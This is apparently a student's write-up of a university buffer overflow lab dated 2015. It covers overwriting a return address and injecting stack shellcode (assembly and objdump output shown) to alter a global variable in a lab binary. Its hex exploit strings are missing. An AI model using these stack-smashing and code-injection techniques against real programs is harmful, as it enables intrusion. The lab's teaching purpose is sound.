The stack probably looks like this.
Level 0: candle
Just overwrite the return address, okay?
Like this:
(hex dump of the level 0 exploit string; the bytes did not survive extraction)
Level 1: sparkler
Requires that the function's argument be changed to the cookie value.
(hex dump of the level 1 exploit string; the bytes did not survive extraction)
Level 2: firecracker
Requires that the global variable checked inside bang be set to the cookie value.
The idea is to return to a specific location on the stack, execute our own code there to overwrite the global value, and then return to the bang function.
Assembly code that replaces the global value:
mov 0x602320, %rsi
mov %rsi, 0x602308
push $0x00401020
retq
Assemble and disassemble it with
$ gcc -c test.s
$ objdump -d test.o > test.d
to generate the machine code:
test.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <.text>:
   0:   48 8b 34 25 20 23 60    mov    0x602320,%rsi
   7:   00
   8:   48 89 34 25 08 23 60    mov    %rsi,0x602308
   f:   00
  10:   68 20 10 40 00          pushq  $0x401020
  15:   c3                      retq
Then place this machine code at a specific location on the stack:
(hex dump of the level 2 exploit string: the machine code above followed by padding and the return address; the bytes did not survive extraction)
That works.
Extra credit, level 3: dynamite, next time.
2015-09-28
Buffer Overflows Lab